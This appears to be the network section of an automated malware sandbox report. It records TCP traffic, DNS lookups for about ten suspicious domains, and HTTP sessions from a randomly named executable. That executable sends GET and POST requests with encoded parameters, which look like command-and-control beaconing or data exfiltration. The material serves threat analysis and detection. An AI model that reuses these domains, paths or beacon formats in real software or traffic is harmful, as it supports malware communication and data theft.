Dec 3, 2024 06:56:34.716306925 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.716316938 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:34.716348886 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:34.716556072 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.716566086 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.716604948 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:34.836123943 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.836189032 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.836236954 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:34.840342999 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.889826059 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:34.905512094 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:34.926367044 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.926417112 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:34.926516056 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.926558018 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:34.931509018 CET | 80 | 50034 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:34.931560040 CET | 50034 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:35.924083948 CET | 50038 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:36.044068098 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:36.044481993 CET | 50038 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:36.057744980 CET | 50038 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:36.177846909 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:36.177966118 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:36.177974939 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:36.178124905 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:36.178181887 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:36.178261995 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:36.178271055 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:36.178447962 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:36.178456068 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.436388016 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.436407089 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.436418056 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.436438084 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.436450005 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.436460018 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.436570883 CET | 50038 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:37.436570883 CET | 50038 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:37.436614037 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.436659098 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.436671019 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.436681986 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.436712027 CET | 50038 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:37.436724901 CET | 50038 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:37.556988001 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.557004929 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.557060003 CET | 50038 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:37.560955048 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.561837912 CET | 50038 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:37.644923925 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.644979000 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.645014048 CET | 50038 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:37.645050049 CET | 50038 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:37.647561073 CET | 80 | 50038 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:37.647609949 CET | 50038 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:38.861757040 CET | 50039 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:38.982001066 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:38.982085943 CET | 50039 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:38.989727974 CET | 50039 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:39.109966993 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.307801008 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.307821035 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.307831049 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.307949066 CET | 50039 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:40.307985067 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.308043957 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.308054924 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.308063984 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.308073044 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.308089018 CET | 50039 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:40.308120012 CET | 50039 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:40.308398962 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.308408976 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.308459997 CET | 50039 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:40.428014994 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.428205013 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.428250074 CET | 50039 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:40.432214022 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.483588934 CET | 50039 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:40.518773079 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.519011021 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.519057989 CET | 50039 | 80 | 192.168.2.4 | 203.161.42.73
Dec 3, 2024 06:56:40.521457911 CET | 80 | 50039 | 203.161.42.73 | 192.168.2.4
Dec 3, 2024 06:56:40.521505117 CET | 50039 | 80 | 192.168.2.4 | 203.161.42.73
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 3, 2024 06:54:07.640765905 CET | 59985 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 06:54:07.966757059 CET | 53 | 59985 | 1.1.1.1 | 192.168.2.4
Dec 3, 2024 06:54:24.425208092 CET | 51920 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 06:54:25.237344027 CET | 53 | 51920 | 1.1.1.1 | 192.168.2.4
Dec 3, 2024 06:54:39.908658981 CET | 64651 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 06:54:40.920866013 CET | 64651 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 06:54:41.049278975 CET | 53 | 64651 | 1.1.1.1 | 192.168.2.4
Dec 3, 2024 06:54:41.059231043 CET | 53 | 64651 | 1.1.1.1 | 192.168.2.4
Dec 3, 2024 06:54:55.378140926 CET | 63432 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 06:54:55.871191978 CET | 53 | 63432 | 1.1.1.1 | 192.168.2.4
Dec 3, 2024 06:55:10.236394882 CET | 59262 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 06:55:11.249140024 CET | 59262 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 06:55:11.597353935 CET | 53 | 59262 | 1.1.1.1 | 192.168.2.4
Dec 3, 2024 06:55:11.597366095 CET | 53 | 59262 | 1.1.1.1 | 192.168.2.4
Dec 3, 2024 06:55:29.402302027 CET | 59846 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 06:55:30.006187916 CET | 53 | 59846 | 1.1.1.1 | 192.168.2.4
Dec 3, 2024 06:55:44.518559933 CET | 51810 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 06:55:45.237375021 CET | 53 | 51810 | 1.1.1.1 | 192.168.2.4
Dec 3, 2024 06:55:59.674165964 CET | 54887 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 06:56:00.055869102 CET | 53 | 54887 | 1.1.1.1 | 192.168.2.4
Dec 3, 2024 06:56:15.233599901 CET | 63287 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 06:56:15.723472118 CET | 53 | 63287 | 1.1.1.1 | 192.168.2.4
Dec 3, 2024 06:56:30.174877882 CET | 52757 | 53 | 192.168.2.4 | 1.1.1.1
Dec 3, 2024 06:56:30.602577925 CET | 53 | 52757 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 3, 2024 06:54:07.640765905 CET | 192.168.2.4 | 1.1.1.1 | 0x7b82 | Standard query (0) | www.izmirescortg.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:54:24.425208092 CET | 192.168.2.4 | 1.1.1.1 | 0xab05 | Standard query (0) | www.aballanet.cat | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:54:39.908658981 CET | 192.168.2.4 | 1.1.1.1 | 0x45af | Standard query (0) | www.madhf.tech | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:54:40.920866013 CET | 192.168.2.4 | 1.1.1.1 | 0x45af | Standard query (0) | www.madhf.tech | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:54:55.378140926 CET | 192.168.2.4 | 1.1.1.1 | 0xbd5b | Standard query (0) | www.canadavinreport.site | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:55:10.236394882 CET | 192.168.2.4 | 1.1.1.1 | 0x9c21 | Standard query (0) | www.yunlekeji.top | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:55:11.249140024 CET | 192.168.2.4 | 1.1.1.1 | 0x9c21 | Standard query (0) | www.yunlekeji.top | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:55:29.402302027 CET | 192.168.2.4 | 1.1.1.1 | 0x8b07 | Standard query (0) | www.logidant.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:55:44.518559933 CET | 192.168.2.4 | 1.1.1.1 | 0xd0e4 | Standard query (0) | www.laohub10.net | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:55:59.674165964 CET | 192.168.2.4 | 1.1.1.1 | 0x21fe | Standard query (0) | www.zkdamdjj.shop | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:56:15.233599901 CET | 192.168.2.4 | 1.1.1.1 | 0x367b | Standard query (0) | www.tals.xyz | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:56:30.174877882 CET | 192.168.2.4 | 1.1.1.1 | 0x4a62 | Standard query (0) | www.brightvision.website | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 3, 2024 06:54:07.966757059 CET | 1.1.1.1 | 192.168.2.4 | 0x7b82 | No error (0) | www.izmirescortg.xyz | | 104.21.36.62 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:54:07.966757059 CET | 1.1.1.1 | 192.168.2.4 | 0x7b82 | No error (0) | www.izmirescortg.xyz | | 172.67.186.192 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:54:25.237344027 CET | 1.1.1.1 | 192.168.2.4 | 0xab05 | No error (0) | www.aballanet.cat | aballanet.cat | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 06:54:25.237344027 CET | 1.1.1.1 | 192.168.2.4 | 0xab05 | No error (0) | aballanet.cat | | 134.0.14.158 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:54:41.049278975 CET | 1.1.1.1 | 192.168.2.4 | 0x45af | No error (0) | www.madhf.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:54:41.059231043 CET | 1.1.1.1 | 192.168.2.4 | 0x45af | No error (0) | www.madhf.tech | | 103.224.182.242 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:54:55.871191978 CET | 1.1.1.1 | 192.168.2.4 | 0xbd5b | No error (0) | www.canadavinreport.site | | 185.27.134.206 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:55:11.597353935 CET | 1.1.1.1 | 192.168.2.4 | 0x9c21 | No error (0) | www.yunlekeji.top | | 106.15.109.33 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:55:11.597366095 CET | 1.1.1.1 | 192.168.2.4 | 0x9c21 | No error (0) | www.yunlekeji.top | | 106.15.109.33 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:55:30.006187916 CET | 1.1.1.1 | 192.168.2.4 | 0x8b07 | No error (0) | www.logidant.xyz | logidant.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 06:55:30.006187916 CET | 1.1.1.1 | 192.168.2.4 | 0x8b07 | No error (0) | logidant.xyz | | 45.141.156.114 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:55:45.237375021 CET | 1.1.1.1 | 192.168.2.4 | 0xd0e4 | No error (0) | www.laohub10.net | r0lqcud7.nbnnn.xyz | | CNAME (Canonical name) | IN (0x0001) | false
Dec 3, 2024 06:55:45.237375021 CET | 1.1.1.1 | 192.168.2.4 | 0xd0e4 | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.159.42 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:55:45.237375021 CET | 1.1.1.1 | 192.168.2.4 | 0xd0e4 | No error (0) | r0lqcud7.nbnnn.xyz | | 23.225.160.132 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:55:45.237375021 CET | 1.1.1.1 | 192.168.2.4 | 0xd0e4 | No error (0) | r0lqcud7.nbnnn.xyz | | 27.124.4.246 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:55:45.237375021 CET | 1.1.1.1 | 192.168.2.4 | 0xd0e4 | No error (0) | r0lqcud7.nbnnn.xyz | | 202.79.161.151 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:56:00.055869102 CET | 1.1.1.1 | 192.168.2.4 | 0x21fe | No error (0) | www.zkdamdjj.shop | | 172.67.187.114 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:56:00.055869102 CET | 1.1.1.1 | 192.168.2.4 | 0x21fe | No error (0) | www.zkdamdjj.shop | | 104.21.40.167 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:56:15.723472118 CET | 1.1.1.1 | 192.168.2.4 | 0x367b | No error (0) | www.tals.xyz | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:56:15.723472118 CET | 1.1.1.1 | 192.168.2.4 | 0x367b | No error (0) | www.tals.xyz | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 3, 2024 06:56:30.602577925 CET | 1.1.1.1 | 192.168.2.4 | 0x4a62 | No error (0) | www.brightvision.website | | 203.161.42.73 | A (IP address) | IN (0x0001) | false
• www.izmirescortg.xyz
• www.aballanet.cat
• www.madhf.tech
• www.canadavinreport.site
• www.yunlekeji.top
• www.logidant.xyz
• www.laohub10.net
• www.zkdamdjj.shop
• www.tals.xyz
• www.brightvision.website
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 104.21.36.62 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
Timestamp | Bytes transferred | Direction | Data
Dec 3, 2024 06:54:08.102482080 CET | 367 | OUT | GET /lnl7/?rfJh=kAPJ1zL1a1XedmcoetGOcXX+BQ0sya6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZSqhyZMy+6OBPTB2cT6zQPdPsX8z060ybXY=&O258-=pHdHBdXhwLO HTTP/1.1
Accept: */*
Accept-Language: en-US
Connection: close
Host: www.izmirescortg.xyz
User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Dec 3, 2024 06:54:09.374830961 CET | 1128 | IN | HTTP/1.1 404 Not Found
Date: Tue, 03 Dec 2024 05:54:09 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: close
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gg9CNp9BliKKfIzIleuGRo2sgboe1DjNSITzUh%2BvaLmdbEwkg6NlbPctPgy1vZ8G09NQKQ6E2%2F%2B%2B7qkfrAxKu4YK74mchpcIUWlwP6dOCjjiUqM8XdEo2YHCqwr2Kl3xTksM0Jh3cw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ec14ce66f67431a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2685&min_rtt=2685&rtt_var=1342&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=367&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.4 | 49737 | 134.0.14.158 | 80 | 792 | C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 3, 2024 06:54:25.381787062 CET | 629 | OUT | POST /6xrr/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.aballanet.cat
                                                      Origin: http://www.aballanet.cat
                                                      Referer: http://www.aballanet.cat/6xrr/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 43 58 30 62 58 4b 50 4f 51 69 4f 76 45 2f 2b 63 7a 65 52 43 44 6b 78 67 45 41 73 51 41 36 75 68 41 3d 3d
                                                      Data Ascii: rfJh=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4CX0bXKPOQiOvE/+czeRCDkxgEAsQA6uhA==
                                                      Dec 3, 2024 06:54:26.921345949 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:54:26 GMT
                                                      Server: Apache
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Transfer-Encoding: chunked
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                      Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
                                                      Dec 3, 2024 06:54:26.921365023 CET | 1236 | IN | Data Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69
                                                      Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
                                                      Dec 3, 2024 06:54:26.921381950 CET | 1236 | IN | Data Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77
                                                      Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
                                                      Dec 3, 2024 06:54:26.921511889 CET | 1236 | IN | Data Raw: 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e
                                                      Data Ascii: u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!
                                                      Dec 3, 2024 06:54:26.921608925 CET | 724 | IN | Data Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65
                                                      Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
